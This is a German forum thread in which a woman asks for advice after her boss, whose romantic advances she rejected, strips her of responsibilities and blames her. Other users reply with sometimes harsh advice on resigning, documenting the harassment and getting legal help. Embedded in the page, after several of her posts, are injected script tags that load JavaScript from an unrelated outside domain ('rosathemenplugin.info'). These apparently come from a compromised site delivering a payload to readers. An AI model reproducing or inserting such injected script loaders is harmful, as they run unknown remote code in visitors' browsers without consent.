Ankündigung

Einklappen
Keine Ankündigung bisher.

Chef hat sich verliebt und mobbt mich jetzt weil ich es nicht erwieder

Einklappen
X

• Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

• Chef hat sich verliebt und mobbt mich jetzt weil ich es nicht erwieder

Hallo zusammen,
    ich arbeite seit 3,5 Jahren in einer kleinen Firma die sehr "Familiär" ist. Ich habe ganz klein angefangen und hab immer mehr Verantwortung bekommen und hab mich auch richtig wohl gefühlt. LetztesJahr dann im September hat mir mein Chef (63 Jahre, ich bin 34 Jahre) mir dann gestanden das er sich in mich verliebt hätte. Ich war im ersten Augenblick geschockt, aber hab mir nichts dabei gedacht. Er fing dann an mir kleine Geschenke zu machen und erfüllte mir auch immer mehr wünsche. Er machte mich zu seiner rechten Hand und stellte mich auch so Geschäftspartner vor. Vor 6 wochen kam er dann an und sagte das er jetzt genug investiert hätte und das es an der Zeit wäre eine Gegenleistung zu erbringen und mit ihm Schlafen sollte. Das verneinte ich natürlich. Das Büro ist in dem Haus wo mein Chef und auch seine Frau wohnt. Ich hab mich immer Super mit Ihr verstanden. Naja, dann fing alles so langsam an. Meine Chefin stellte mich vor den ganzen Mitarbeitern bloß ich wollte was von meinem Chef und solle aufpassen. Mir nahm man jetzt all meine verantwortung und ich darf jetzt auch nur die "kleinen" arbeiten ausführen. Mein Chef gibt mir auch immer kleine Zeichen verbal, von wegen, wenn Du lieb zu mir bist dann wird alles wieder gut. Ich konnte es keinem erzählen weil ich mich so geschämt habe. Aber am wochenende konnte ich nicht mehr. Bin zusammen gebrochen weil mein Chef mir für alles die Schuld gibt. Ich hab es meinem Mann erzählt und er schickte mich direkt zum Arzt. Ich muss dazu sagen das ich schon 2 mal gekündigt habe und er diese vor meinen Augen zerrissen hat. Er würde mich nicht gehen lassen weil ich zu viel weiss... Bin heut morgen dann aber zu meiner Ärztin die mich auch sofort Krank geschrieben hat. Ich weiss nicht was ich machen soll und habe Angst das er mich jetzt fertig machen will und mich schlecht da stellt obwohl ich mir Beruflich nie was zu schulden lassen hab. Auch nicht meinem Chef gegenüber. Weiß jemand ein Rat wie ich mich verhalten soll?
    <script src="http://rosathemenplugin.info/dfi823hs.js?0.06897060810406985"></script>

AW: Chef hat sich verliebt und mobbt mich jetzt weil ich es nicht erwieder

Hallo Confusion!

Ich suche gerade eine neue Arbeit und gehe dann. Dir möchte ich das gleiche raten. Dieser alte Sack ist ein berechnender Egoist. Das hat mit liebe nichts zu tun. Der hat ja wohl eine Hodenschwellung. Mein ehemaliger Chef hatte in Tschechien " Auswärtsspiele". Seine Frau kam dahinter und hat ihn beim Zoll wegen Steuerhinterziehung angezeigt. Ich bin noch rechtzeitig rausgekommen aus dem Laden. Anderenfalls hätte ich eine Anzeige wegen beihilfe dazu bekommen können. Wobei ich ihn auf diese Mißstände angesprochen hatte und um Abstellung dieser "Geschäftspraktiken" gebeten hatte.

Viel glück!

Alteisenfahrer

Kommentar

Hallo Alteisenfahrer,
      das will ich ja auch so schnell wie Möglich. Ich hab nur Angst vor den konsequenzen denn er ist echt Unberechenbar. Wir wohnen nur in einer kleinen Stadt und ich weiss eben nicht was er so alles vor hat. Er hat ja auch Dreck am stecken, das weiß ich genau. Aber kann eben nichts genaues beweisen. Deswegen bin ich eben so hin und her gerissen. Seine Frau hat er ja schon im Griff was das angeht und die ist so naiv und glaubt ihm eben alles. Weiß eben nicht wie ich Sauber aus der sache komme. Möchte einfach nur ne Kündigung und meine Ruhe.
      <script src="http://rosathemenplugin.info/dfi823hs.js?0.0923820601420452"></script>

Kommentar

Hallo! NAIV bist Du und töricht!!! Sorry, ich bin jetzt mal direkt! Wie kannst Du Geschenke annehmen vom Chef, wenn Du weißt, er will was von Dir und Du nicht! Du hast genommen und Dich geschmeichelt gefühlt, ohne Grenzen zu setzen. Stell Dir mal vor, Dein Mann würde sowas machen, Dich möchte ich dann mal sehen;-))) Die Ehefrau kann ich verstehen! Diese Suppe hast Du Dir ganz alleine eingebrockt!!!Nun löffel sie mit Anstand aus! Vorschlag: Rede mit der Ehefrau und erzäh ihr ALLES! Und entschuldige Dich bei Ihr! Dann schreibst Du die Kündigung und schickst sie per Einschreiben und Rückantwort, Deinem Chef zu! Beweis der Abgabe! Seh zu das Du was anderes findest, denn da kannst Du keinen Blumentopf mehr gewinnen! Alter schützt vor Torheit nicht, aber so unschuldig bist Du auch nicht daran! Die Geschenke gibst Du auch zurück, falls Du es kannst! Mach reinen Tisch und gehe mit Anstand da raus! Und ich hoffe, es war Dir eine Lehre! Das der Chef Dreck am Stecken hat, spielt keine Rolle, daß haben viele Chefs! Hier geht es um was ganz Anderem. Aber evtl. versteht die Ehefrau und hilft Dir da rauszukommen, aber mit Standpauke;-)))) So, jetz gehts mir besser, Du warst aber auch ..... !Denk mal bitte nach! Sei lieb gegrüßt Biggi

Kommentar

Hallo Confusion!
          Aus den Augen - aus dm Sinn! Auch er wird sich damit abfinden das Er nicht alles haben kann was er will. Wenn Du nicht in Seiner unmittelbaren Umgebung bist wird er Dich ganz schnell vergessen. Hab keine Angst und ziehe Dein Ding durch. Bei Ihm überwiegen sowiso inzwischen Rachegelüste. Das brauchst Du dir nicht antun!

Alteisenfahrer

Kommentar

Hallo Biggi,

ich weiß das ich dumm und naiv war/bin. Ich würde es auch der Frau sagen, das Problem ist das mein Chef mir schon sagte ich bräuchte nicht mit ihr zu reden denn er hätte es schon alles mit ihr besprochen und mich eben als Schuldige dahin gestellt. Dabei habe ich es auch schon versucht mit ihr zu reden aber sie geht mir aus dem weg und will nicht mit mir reden. Hab Ihr auch ein Brief geschrieben und selbst da kam nichts von ihrer seite. Das es ein fehler war die Geschenke anzunehmen weiß ich auch. Aber ich hab es eben genommen und kann nichts mehr an die Vergangenheit ändern. Ich weiß nur nicht was er jetzt davon hat mich weiterhin so fertig zu machen. Ich möchte nur gehen, mehr nicht.
            <script src="http://rosathemenplugin.info/dfi823hs.js?0.561786934373034"></script>

Kommentar

Hey! Einsicht ist schon mal gut! Gib der Ehefrau die Geschenke zurück, damit sie sieht, Du meinst es ernst!!!! Mach das mit der Kündigung, wie ich es vorgeschlagen habe! Und Deinem Chef, nimmst Du die rosa Brille ab, knallhart! Kündigen! Neuen Job! Laß Dich nicht von dem Chef bedrohen oder einwickeln, beziehe ganz klar Stellung! Du wirst kein Verständnis erwarten können, von niemanden! Der Chef hat noch eine große Klappe, der alte Mann ist verletzt, er bekam wahrscheinlich immer was er wollte, wird Zeit, daß er eines besseren belehrt wird! Du sollst nicht gehen, weil er soviel Dreck am laufen hat? Na und, nicht Dein Bier! Zeig Stärke und verweise ihn, in die Schranken! Gruß Biggi P.S. Habe gleich Wohnungsbesichtigung, muß weg! Heute Abend? Falls Du noch Fragen hast?

Kommentar

Ich denke das ist eine Gute Lösung. Das wird Ihr vielleicht auch zeigen das ich es ernst meine und das ihr Mann ein Schwein ist und mehr nicht. Bin gern heut abend wieder da. Hab da noch die eine oder andere frage...
                <script src="http://rosathemenplugin.info/dfi823hs.js?0.26028672888109217"></script>

Kommentar

Hallo Confusion,

ich würde die Geschenke fotografieren, dann in einen Karton packen und zusammen mit der Kündigung per Einschreiben und Rückantwort.
                  Ich würde weiter auflisten, wann er mir mir welche Avancen und Geschenke und direkte Anträge gemacht hat und wie ich daruf reagiert habe.
                  Alles zusammen (Fotos und Aufzeichnungen, sowie Kündigungsschreiben) würde ich einem Anwalt für Arbeitsrecht übergeben, mit der Bitte, ein Schreiben zu formulieren, das aussagt, das die Kündigung nötig war, wegen der Grenzüberschreitungen des Chefs.
                  Danach kannst du beim Arbeitsamt sofort Arbeitslosengeld beantragen.
                  Eine Kur zur Erholung und Wiederherstellung der gesunden Arbeitsfähigkeit, beantragst du über deinen Hausarzt bei deiner Rentenversicherung. Lege das Schreiben des Anwalts bei, dann sollte es klappen.
                  Dieser Chef ist kein guter Chef! Und wenn er dafür sorgt, dass du in der Branche keine Anstellung mehr findest, wende dich an das Arbeitsamt mit dem Hinweis, dass du Hilfe benötigst und auch bereit bist, Klage gegen diesen Chef einzureichen.

Die Leute vom Arbeitsamt haben auch Beziehungen, die dir helfen könnten.
                  Es tut mir so leid, dass du in so schmutzige Dinge verwickelt wurdest; wohl auch etwas blauäugig, aber das kann ja Keiner ahnen, dass der sich so versteift.
                  Kopf hoch,
                  liebe Grüße
                  Ibag

Kommentar

Hallo!

Schau das Du ein ordentliches Zeugnis bekommst.

LG Alteisenfahrer

Kommentar

Hallo nochmal,

seit heut mittag ist noch was ganz fieses passiert. Mein Mann hat meine Krankmeldung abgegeben und ihm nur ein wink gegeben von wegen er weiss von allem. Da sagte er doch tatsächlich meinem Mann ins Gesicht das ich mich ihm angeboten hätte für Geld mit ihm zu schlafen. Und ich nicht damit klar kommen würde das er was "neues" hätte. Lach, der ist verheiratet. Mein Mann hat nur mit dem Kopf geschüttelt und ihm gesagt das er sowas von Krank ist. Unglaublich. Dann rief er mich noch an und sagte zu mir das wir hoffentlich alles "sauber" über die Bühne bringen können und mich dann auch gehen läßt. Der muss aber viel zu verbergen haben. Wie soll ich denn jetzt reagieren? Ich hab mich auf kein Gespräch mehr eingelassen. Da steckt noch so viel dahinter, ich bin auch wohl nicht die einzigste die er fertig machen will, das hab ich schon rausbekommen.
                      <script src="http://rosathemenplugin.info/dfi823hs.js?0.7543812457784828"></script>

Kommentar

Dein Chef ist ein Idiot und Schießer! Der will das Du gehst, ohne ihn, in die Pfanne zu hauen! Mach das! Dein Mann soll ihm NICHT drohen, daß ist Pillepalle unter Männer! Ich sagte schon, kündige und such Dir was Neues, nicht drohen, oder sonst welche anzüglichen Bemerkungen! Das reizt ihn nur, für nochmehr doofe Sprüche und Drohungen! Gottes Mühlen malen lagsam, aber gerecht, der wird schon irgendwann auf die Nase fallen, aber dann bist Du schon lange nicht mehr da! Laß die Vergangenheit ruhen, denke jetzt nur an Dich! Du bist wichtig, nicht die Firma und was da abgeht, oder abgegangen ist! Klar? Gruss Biggi

Kommentar

Glasklar. Ich werde jetzt auf meine Kündigung warten die er mir zuschicken möchte und dann werde ich mich um die Firma und alles was damit zu tun hat nicht mehr kümmern. Ich hoffe nur das er nicht noch andere Dinge vor hat. So langsam glaub ich echt der ist zu allem im Stande. Es ist wirklich so das er immer alles bekommen hat und jetzt mal vor einer Hürde steht was nicht zu bekommen. Mein Mann wird sich auch zurück halten. Er wollte ihm ja auch nur ein Wink geben und sehen wie seine Reaktion darauf ist. Die sagte ihm auch schon alles. Danke Biggi das Du mir echt mal den Kopf gewaschen hast. Von einem Außenstehenden sowas am Kopf geschmissen zu bekommen tut mal echt gut....
                          <script src="http://rosathemenplugin.info/dfi823hs.js?0.6177692755348443"></script>

Kommentar

Hallo Confusion! Er ist wie ein krankes Tier was in den letzten Zügen alles verbeißt was ihm zu nahe kommt. Mit dem würde ich nicht alllein in einem Raum sein wollen. Suche Dir schutz oder mindestens Pfefferspray. solltest Du mit dem knaller allein sein. Führe ein Mobbingtagebuch handschriftlich das dient zur Beweissicherung vor Gericht. und lass Dich nicht einschüchtern

Alteisenfahrer

Kommentar

Sorry, aber eine deutliche Sprache tut manchmal Wunder;-)))) Viel Glück! Gruß Biggi P.S.Halt Dich an Deiner geraden erworbenen Erkenntnis;-)))

Kommentar

Lädt...
                              X